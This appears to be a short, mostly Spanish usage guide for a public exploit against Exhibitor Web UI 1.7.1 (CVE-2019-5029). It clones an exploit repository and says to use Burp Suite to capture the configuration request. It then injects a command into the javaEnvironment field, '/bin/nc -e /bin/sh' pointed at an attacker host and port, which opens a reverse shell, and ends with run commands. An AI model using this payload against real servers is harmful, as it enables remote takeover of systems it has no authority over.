
Exihibitor Web Ui 1.7.1 RCE, CVE-2019-5029
Exhibitor Web Ui 1.7.1 RCE, CVE-2019-5029
$ git clone https://github.com/thehunt1s0n/Exihibitor-RCE/
$ cd Exihibitor-RCE/
Es posible que necesites editar la carga útil de datos json en el script. Para ello, simplemente captura la solicitud usando Burp Suite al confirmar los cambios en la pestaña de configuración de Exhibitor y copia y pega en el comando curl en el script.
Asegúrate de cambiar el javaEnvironment con lo siguiente:
"javaEnvironment":"$(/bin/nc -e /bin/sh '$ATTACKER_HOST' '$ATTACKER_PORT' &)"
./exploit.sh <attacker_host> <attacker_port>
Ejemplo:
$ ./exploit.sh 192.168.197.98 8080 192.168.45.187 8080
